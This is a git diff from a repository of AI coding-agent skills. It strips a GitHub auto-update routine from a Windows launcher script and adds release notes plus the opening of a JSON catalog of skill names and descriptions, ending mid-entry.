diff --git a/START_APP.bat b/START_APP.bat
index 5555ab67..6c183e01 100644
--- a/START_APP.bat
+++ b/START_APP.bat
@@ -14,101 +14,15 @@ IF %ERRORLEVEL% NEQ 0 (
exit /b 1
)
-:: ===== Auto-Update Skills from GitHub =====
-echo [INFO] Checking for skill updates...
-
-:: Method 1: Try Git first (if available)
-WHERE git >nul 2>nul
-IF %ERRORLEVEL% EQU 0 goto :USE_GIT
-
-:: Method 2: Try PowerShell download (fallback)
-echo [INFO] Git not found. Using alternative download method...
-goto :USE_POWERSHELL
-
-:USE_GIT
-:: Add upstream remote if not already set
-git remote get-url upstream >nul 2>nul
-IF %ERRORLEVEL% EQU 0 goto :DO_FETCH
-echo [INFO] Adding upstream remote...
-git remote add upstream https://github.com/sickn33/antigravity-awesome-skills.git
-
-:DO_FETCH
-echo [INFO] Fetching latest skills from original repo...
-git fetch upstream >nul 2>nul
-IF %ERRORLEVEL% NEQ 0 goto :FETCH_FAIL
-goto :DO_MERGE
-
-:FETCH_FAIL
-echo [WARN] Could not fetch updates via Git. Trying alternative method...
-goto :USE_POWERSHELL
-
-:DO_MERGE
-:: Surgically extract ONLY the /skills/ folder from upstream to avoid all merge conflicts
-git checkout upstream/main -- skills >nul 2>nul
-IF %ERRORLEVEL% NEQ 0 goto :MERGE_FAIL
-
-:: Save the updated skills to local history silently
-git commit -m "auto-update: sync latest skills from upstream" >nul 2>nul
-echo [INFO] Skills updated successfully from original repo!
-goto :SKIP_UPDATE
-
-:MERGE_FAIL
-echo [WARN] Could not update skills via Git. Trying alternative method...
-goto :USE_POWERSHELL
-
-:USE_POWERSHELL
-echo [INFO] Downloading latest skills via HTTPS...
-if exist "update_temp" rmdir /S /Q "update_temp" >nul 2>nul
-if exist "update.zip" del "update.zip" >nul 2>nul
-
-:: Download the latest repository as ZIP
-powershell -Command "Invoke-WebRequest -Uri 'https://github.com/sickn33/antigravity-awesome-skills/archive/refs/heads/main.zip' -OutFile 'update.zip' -UseBasicParsing" >nul 2>nul
-IF %ERRORLEVEL% NEQ 0 goto :DOWNLOAD_FAIL
-
-:: Extract and update skills
-echo [INFO] Extracting latest skills...
-powershell -Command "Expand-Archive -Path 'update.zip' -DestinationPath 'update_temp' -Force" >nul 2>nul
-IF %ERRORLEVEL% NEQ 0 goto :EXTRACT_FAIL
-
-:: Copy only the skills folder
-if exist "update_temp\antigravity-awesome-skills-main\skills" (
- echo [INFO] Updating skills directory...
- xcopy /E /Y /I "update_temp\antigravity-awesome-skills-main\skills" "skills" >nul 2>nul
- echo [INFO] Skills updated successfully without Git!
-) else (
- echo [WARN] Could not find skills folder in downloaded archive.
- goto :UPDATE_FAIL
-)
-
-:: Cleanup
-del "update.zip" >nul 2>nul
-rmdir /S /Q "update_temp" >nul 2>nul
-goto :SKIP_UPDATE
-
-:DOWNLOAD_FAIL
-echo [WARN] Failed to download skills update (network issue or no internet).
-goto :UPDATE_FAIL
-
-:EXTRACT_FAIL
-echo [WARN] Failed to extract downloaded skills archive.
-goto :UPDATE_FAIL
-
-:UPDATE_FAIL
-echo [INFO] Continuing with local skills version...
-echo [INFO] To manually update skills later, run: npm run update:skills
-
-:SKIP_UPDATE
-
:: Check/Install dependencies
cd web-app
-:CHECK_DEPS
if not exist "node_modules\" (
echo [INFO] Dependencies not found. Installing...
goto :INSTALL_DEPS
)
-:: Verify dependencies aren't corrupted (e.g. esbuild arch mismatch after update)
+:: Verify dependencies aren't corrupted
echo [INFO] Verifying app dependencies...
call npx -y vite --version >nul 2>nul
if %ERRORLEVEL% NEQ 0 (
@@ -138,6 +52,7 @@ call npm run app:setup
:: Start App
echo [INFO] Starting Web App...
echo [INFO] Opening default browser...
+echo [INFO] Use the Sync Skills button in the app to update skills from GitHub!
cd web-app
call npx -y vite --open
diff --git a/release_notes.md b/release_notes.md
new file mode 100644
index 00000000..21d26682
--- /dev/null
+++ b/release_notes.md
@@ -0,0 +1,14 @@
+## v6.2.0 - Interactive Web App & AWS IaC
+
+**Feature release: Interactive Skills Web App, AWS Infrastructure as Code skills, and Chrome Extension / Cloudflare Workers developer skills.**
+
+- **New skills** (PR #124): `cdk-patterns`, `cloudformation-best-practices`, `terraform-aws-modules`.
+- **New skills** (PR #128): `chrome-extension-developer`, `cloudflare-workers-expert`.
+- **Interactive Skills Web App** (PR #126): Local skills browser with `START_APP.bat`, setup, and `web-app/` project.
+- **Shopify Development Skill Fix** (PR #125): Markdown syntax cleanup for `skills/shopify-development/SKILL.md`.
+- **Community Sources** (PR #127): Added SSOJet skills and integration guides to Credits & Sources.
+- **Registry**: Now tracking 930 skills.
+
+---
+
+_Upgrade: `git pull origin main` or `npx antigravity-awesome-skills`_
diff --git a/web-app/public/skills.json b/web-app/public/skills.json
new file mode 100644
index 00000000..297e8505
--- /dev/null
+++ b/web-app/public/skills.json
@@ -0,0 +1,9682 @@
+[
+ {
+ "id": "00-andruia-consultant",
+ "path": "skills/00-andruia-consultant",
+ "category": "andruia",
+ "name": "00-andruia-consultant",
+ "description": "Arquitecto de Soluciones Principal y Consultor Tecnol\u00f3gico de Andru.ia. Diagnostica y traza la hoja de ruta \u00f3ptima para proyectos de IA en espa\u00f1ol.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "10-andruia-skill-smith",
+ "path": "skills/10-andruia-skill-smith",
+ "category": "andruia",
+ "name": "10-andruia-skill-smith",
+ "description": "Ingeniero de Sistemas de Andru.ia. Dise\u00f1a, redacta y despliega nuevas habilidades (skills) dentro del repositorio siguiendo el Est\u00e1ndar de Diamante.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-25"
+ },
+ {
+ "id": "20-andruia-niche-intelligence",
+ "path": "skills/20-andruia-niche-intelligence",
+ "category": "andruia",
+ "name": "20-andruia-niche-intelligence",
+ "description": "Estratega de Inteligencia de Dominio de Andru.ia. Analiza el nicho espec\u00edfico de un proyecto para inyectar conocimientos, regulaciones y est\u00e1ndares \u00fanicos del sector. Act\u00edvalo tras definir el nicho.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "2d-games",
+ "path": "skills/game-development/2d-games",
+ "category": "game-development",
+ "name": "2d-games",
+ "description": "2D game development principles. Sprites, tilemaps, physics, camera.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "3d-games",
+ "path": "skills/game-development/3d-games",
+ "category": "game-development",
+ "name": "3d-games",
+ "description": "3D game development principles. Rendering, shaders, physics, cameras.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "3d-web-experience",
+ "path": "skills/3d-web-experience",
+ "category": "uncategorized",
+ "name": "3d-web-experience",
+ "description": "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ab-test-setup",
+ "path": "skills/ab-test-setup",
+ "category": "uncategorized",
+ "name": "ab-test-setup",
+ "description": "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "accessibility-compliance-accessibility-audit",
+ "path": "skills/accessibility-compliance-accessibility-audit",
+ "category": "uncategorized",
+ "name": "accessibility-compliance-accessibility-audit",
+ "description": "You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "active-directory-attacks",
+ "path": "skills/active-directory-attacks",
+ "category": "uncategorized",
+ "name": "active-directory-attacks",
+ "description": "This skill should be used when the user asks to \"attack Active Directory\", \"exploit AD\", \"Kerberoasting\", \"DCSync\", \"pass-the-hash\", \"BloodHound enumeration\", \"Golden Ticket\", ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "activecampaign-automation",
+ "path": "skills/activecampaign-automation",
+ "category": "uncategorized",
+ "name": "activecampaign-automation",
+ "description": "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "address-github-comments",
+ "path": "skills/address-github-comments",
+ "category": "uncategorized",
+ "name": "address-github-comments",
+ "description": "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-evaluation",
+ "path": "skills/agent-evaluation",
+ "category": "uncategorized",
+ "name": "agent-evaluation",
+ "description": "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring\u2014where even top agents achieve less than 50% on re...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-framework-azure-ai-py",
+ "path": "skills/agent-framework-azure-ai-py",
+ "category": "uncategorized",
+ "name": "agent-framework-azure-ai-py",
+ "description": "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-manager-skill",
+ "path": "skills/agent-manager-skill",
+ "category": "uncategorized",
+ "name": "agent-manager-skill",
+ "description": "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-memory-mcp",
+ "path": "skills/agent-memory-mcp",
+ "category": "uncategorized",
+ "name": "agent-memory-mcp",
+ "description": "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-memory-systems",
+ "path": "skills/agent-memory-systems",
+ "category": "uncategorized",
+ "name": "agent-memory-systems",
+ "description": "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-orchestration-improve-agent",
+ "path": "skills/agent-orchestration-improve-agent",
+ "category": "uncategorized",
+ "name": "agent-orchestration-improve-agent",
+ "description": "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-orchestration-multi-agent-optimize",
+ "path": "skills/agent-orchestration-multi-agent-optimize",
+ "category": "uncategorized",
+ "name": "agent-orchestration-multi-agent-optimize",
+ "description": "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agent-tool-builder",
+ "path": "skills/agent-tool-builder",
+ "category": "uncategorized",
+ "name": "agent-tool-builder",
+ "description": "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agentfolio",
+ "path": "skills/agentfolio",
+ "category": "uncategorized",
+ "name": "agentfolio",
+ "description": "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory.",
+ "risk": "unknown",
+ "source": "agentfolio.io",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "agents-v2-py",
+ "path": "skills/agents-v2-py",
+ "category": "uncategorized",
+ "name": "agents-v2-py",
+ "description": "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-agent-development",
+ "path": "skills/ai-agent-development",
+ "category": "granular-workflow-bundle",
+ "name": "ai-agent-development",
+ "description": "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-agents-architect",
+ "path": "skills/ai-agents-architect",
+ "category": "uncategorized",
+ "name": "ai-agents-architect",
+ "description": "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-engineer",
+ "path": "skills/ai-engineer",
+ "category": "uncategorized",
+ "name": "ai-engineer",
+ "description": "Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-ml",
+ "path": "skills/ai-ml",
+ "category": "workflow-bundle",
+ "name": "ai-ml",
+ "description": "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-product",
+ "path": "skills/ai-product",
+ "category": "uncategorized",
+ "name": "ai-product",
+ "description": "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "ai-wrapper-product",
+ "path": "skills/ai-wrapper-product",
+ "category": "uncategorized",
+ "name": "ai-wrapper-product",
+ "description": "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov...",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "airflow-dag-patterns",
+ "path": "skills/airflow-dag-patterns",
+ "category": "uncategorized",
+ "name": "airflow-dag-patterns",
+ "description": "Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "airtable-automation",
+ "path": "skills/airtable-automation",
+ "category": "uncategorized",
+ "name": "airtable-automation",
+ "description": "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "algolia-search",
+ "path": "skills/algolia-search",
+ "category": "uncategorized",
+ "name": "algolia-search",
+ "description": "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality.",
+ "risk": "unknown",
+ "source": "vibeship-spawner-skills (Apache 2.0)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "algorithmic-art",
+ "path": "skills/algorithmic-art",
+ "category": "uncategorized",
+ "name": "algorithmic-art",
+ "description": "Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields,...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "amplitude-automation",
+ "path": "skills/amplitude-automation",
+ "category": "uncategorized",
+ "name": "amplitude-automation",
+ "description": "Automate Amplitude tasks via Rube MCP (Composio): events, user activity, cohorts, user identification. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "analytics-tracking",
+ "path": "skills/analytics-tracking",
+ "category": "uncategorized",
+ "name": "analytics-tracking",
+ "description": "Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "android-jetpack-compose-expert",
+ "path": "skills/android-jetpack-compose-expert",
+ "category": "uncategorized",
+ "name": "android-jetpack-compose-expert",
+ "description": "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "android_ui_verification",
+ "path": "skills/android_ui_verification",
+ "category": "uncategorized",
+ "name": "android_ui_verification",
+ "description": "Automated end-to-end UI testing and verification on an Android Emulator using ADB.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-28"
+ },
+ {
+ "id": "angular",
+ "path": "skills/angular",
+ "category": "uncategorized",
+ "name": "angular",
+ "description": "Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "angular-best-practices",
+ "path": "skills/angular-best-practices",
+ "category": "uncategorized",
+ "name": "angular-best-practices",
+ "description": "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "angular-migration",
+ "path": "skills/angular-migration",
+ "category": "uncategorized",
+ "name": "angular-migration",
+ "description": "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "angular-state-management",
+ "path": "skills/angular-state-management",
+ "category": "uncategorized",
+ "name": "angular-state-management",
+ "description": "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "angular-ui-patterns",
+ "path": "skills/angular-ui-patterns",
+ "category": "uncategorized",
+ "name": "angular-ui-patterns",
+ "description": "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states.",
+ "risk": "safe",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "anti-reversing-techniques",
+ "path": "skills/anti-reversing-techniques",
+ "category": "uncategorized",
+ "name": "anti-reversing-techniques",
+ "description": "Understand anti-reversing, obfuscation, and protection techniques encountered during software analysis. Use when analyzing protected binaries, bypassing anti-debugging for authorized analysis, or u...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "antigravity-workflows",
+ "path": "skills/antigravity-workflows",
+ "category": "uncategorized",
+ "name": "antigravity-workflows",
+ "description": "Orchestrate multiple Antigravity skills through guided workflows for SaaS MVP delivery, security audits, AI agent builds, and browser QA.",
+ "risk": "none",
+ "source": "self",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-design-principles",
+ "path": "skills/api-design-principles",
+ "category": "uncategorized",
+ "name": "api-design-principles",
+ "description": "Master REST and GraphQL API design principles to build intuitive, scalable, and maintainable APIs that delight developers. Use when designing new APIs, reviewing API specifications, or establishing...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-documentation",
+ "path": "skills/api-documentation",
+ "category": "granular-workflow-bundle",
+ "name": "api-documentation",
+ "description": "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-documentation-generator",
+ "path": "skills/api-documentation-generator",
+ "category": "uncategorized",
+ "name": "api-documentation-generator",
+ "description": "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-documenter",
+ "path": "skills/api-documenter",
+ "category": "uncategorized",
+ "name": "api-documenter",
+ "description": "Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-fuzzing-bug-bounty",
+ "path": "skills/api-fuzzing-bug-bounty",
+ "category": "uncategorized",
+ "name": "api-fuzzing-bug-bounty",
+ "description": "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-patterns",
+ "path": "skills/api-patterns",
+ "category": "uncategorized",
+ "name": "api-patterns",
+ "description": "API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-security-best-practices",
+ "path": "skills/api-security-best-practices",
+ "category": "uncategorized",
+ "name": "api-security-best-practices",
+ "description": "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-security-testing",
+ "path": "skills/api-security-testing",
+ "category": "granular-workflow-bundle",
+ "name": "api-security-testing",
+ "description": "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "api-testing-observability-api-mock",
+ "path": "skills/api-testing-observability-api-mock",
+ "category": "uncategorized",
+ "name": "api-testing-observability-api-mock",
+ "description": "You are an API mocking expert specializing in realistic mock services for development, testing, and demos. Design mocks that simulate real API behavior and enable parallel development.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "apify-actor-development",
+ "path": "skills/apify-actor-development",
+ "category": "uncategorized",
+ "name": "apify-actor-development",
+ "description": "Develop, debug, and deploy Apify Actors - serverless cloud programs for web scraping, automation, and data processing. Use when creating new Actors, modifying existing ones, or troubleshooting Acto...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-actorization",
+ "path": "skills/apify-actorization",
+ "category": "uncategorized",
+ "name": "apify-actorization",
+ "description": "Convert existing projects into Apify Actors - serverless cloud programs. Actorize JavaScript/TypeScript (SDK with Actor.init/exit), Python (async context manager), or any language (CLI wrapper). Us...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-audience-analysis",
+ "path": "skills/apify-audience-analysis",
+ "category": "uncategorized",
+ "name": "apify-audience-analysis",
+ "description": "Understand audience demographics, preferences, behavior patterns, and engagement quality across Facebook, Instagram, YouTube, and TikTok.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-brand-reputation-monitoring",
+ "path": "skills/apify-brand-reputation-monitoring",
+ "category": "uncategorized",
+ "name": "apify-brand-reputation-monitoring",
+ "description": "Track reviews, ratings, sentiment, and brand mentions across Google Maps, Booking.com, TripAdvisor, Facebook, Instagram, YouTube, and TikTok. Use when user asks to monitor brand reputation, analyze...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-competitor-intelligence",
+ "path": "skills/apify-competitor-intelligence",
+ "category": "uncategorized",
+ "name": "apify-competitor-intelligence",
+ "description": "Analyze competitor strategies, content, pricing, ads, and market positioning across Google Maps, Booking.com, Facebook, Instagram, YouTube, and TikTok.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-content-analytics",
+ "path": "skills/apify-content-analytics",
+ "category": "uncategorized",
+ "name": "apify-content-analytics",
+ "description": "Track engagement metrics, measure campaign ROI, and analyze content performance across Instagram, Facebook, YouTube, and TikTok.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-ecommerce",
+ "path": "skills/apify-ecommerce",
+ "category": "uncategorized",
+ "name": "apify-ecommerce",
+ "description": "Scrape e-commerce data for pricing intelligence, customer reviews, and seller discovery across Amazon, Walmart, eBay, IKEA, and 50+ marketplaces. Use when user asks to monitor prices, track competi...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-influencer-discovery",
+ "path": "skills/apify-influencer-discovery",
+ "category": "uncategorized",
+ "name": "apify-influencer-discovery",
+ "description": "Find and evaluate influencers for brand partnerships, verify authenticity, and track collaboration performance across Instagram, Facebook, YouTube, and TikTok.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-lead-generation",
+ "path": "skills/apify-lead-generation",
+ "category": "uncategorized",
+ "name": "apify-lead-generation",
+ "description": "Generates B2B/B2C leads by scraping Google Maps, websites, Instagram, TikTok, Facebook, LinkedIn, YouTube, and Google Search. Use when user asks to find leads, prospects, businesses, build lead lis...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-market-research",
+ "path": "skills/apify-market-research",
+ "category": "uncategorized",
+ "name": "apify-market-research",
+ "description": "Analyze market conditions, geographic opportunities, pricing, consumer behavior, and product validation across Google Maps, Facebook, Instagram, Booking.com, and TripAdvisor.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-trend-analysis",
+ "path": "skills/apify-trend-analysis",
+ "category": "uncategorized",
+ "name": "apify-trend-analysis",
+ "description": "Discover and track emerging trends across Google Trends, Instagram, Facebook, YouTube, and TikTok to inform content strategy.",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "apify-ultimate-scraper",
+ "path": "skills/apify-ultimate-scraper",
+ "category": "uncategorized",
+ "name": "apify-ultimate-scraper",
+ "description": "Universal AI-powered web scraper for any platform. Scrape data from Instagram, Facebook, TikTok, YouTube, Google Maps, Google Search, Google Trends, Booking.com, and TripAdvisor. Use for lead gener...",
+ "risk": "unknown",
+ "source": "unknown",
+ "date_added": null
+ },
+ {
+ "id": "app-builder",
+ "path": "skills/app-builder",
+ "category": "uncategorized",
+ "name": "app-builder",
+ "description": "Main application building orchestrator. Creates full-stack applications from natural language requests. Determines project type, selects tech stack, coordinates agents.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "app-store-optimization",
+ "path": "skills/app-store-optimization",
+ "category": "uncategorized",
+ "name": "app-store-optimization",
+ "description": "Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "appdeploy",
+ "path": "skills/appdeploy",
+ "category": "uncategorized",
+ "name": "appdeploy",
+ "description": "Deploy web apps with backend APIs, database, and file storage. Use when the user asks to deploy or publish a website or web app and wants a public URL. Uses HTTP API via curl.",
+ "risk": "safe",
+ "source": "AppDeploy (MIT)",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "application-performance-performance-optimization",
+ "path": "skills/application-performance-performance-optimization",
+ "category": "uncategorized",
+ "name": "application-performance-performance-optimization",
+ "description": "Optimize end-to-end application performance with profiling, observability, and backend/frontend tuning. Use when coordinating performance optimization across the stack.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "architect-review",
+ "path": "skills/architect-review",
+ "category": "uncategorized",
+ "name": "architect-review",
+ "description": "Master software architect specializing in modern architecture",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "architecture",
+ "path": "skills/architecture",
+ "category": "uncategorized",
+ "name": "architecture",
+ "description": "Architectural decision-making framework. Requirements analysis, trade-off evaluation, ADR documentation. Use when making architecture decisions or analyzing system design.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "architecture-decision-records",
+ "path": "skills/architecture-decision-records",
+ "category": "uncategorized",
+ "name": "architecture-decision-records",
+ "description": "Write and maintain Architecture Decision Records (ADRs) following best practices for technical decision documentation. Use when documenting significant technical decisions, reviewing past architect...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "architecture-patterns",
+ "path": "skills/architecture-patterns",
+ "category": "uncategorized",
+ "name": "architecture-patterns",
+ "description": "Implement proven backend architecture patterns including Clean Architecture, Hexagonal Architecture, and Domain-Driven Design. Use when architecting complex backend systems or refactoring existing ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "arm-cortex-expert",
+ "path": "skills/arm-cortex-expert",
+ "category": "uncategorized",
+ "name": "arm-cortex-expert",
